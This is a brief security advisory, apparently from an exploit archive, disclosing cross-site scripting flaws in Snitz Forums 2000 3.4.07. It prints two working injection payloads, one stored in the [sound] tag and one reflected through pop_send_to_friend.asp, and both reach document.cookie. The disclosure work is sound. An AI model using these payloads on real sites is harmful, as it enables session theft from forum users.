Lucene search
Snitz Forums 2000 Multiple Cross-Site Scripting
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilitie
Show more
===============================================================
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
===============================================================
**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Vuln: Multiple Cross-Site Scripting
**************************************************************
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)">
Note the space: onLoad<space>="alert(document.cookie)"
######
# 0day.today [2018-03-20] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo15 Oct 2009 00:00Current
7.1High risk
Vulners AI Score7.1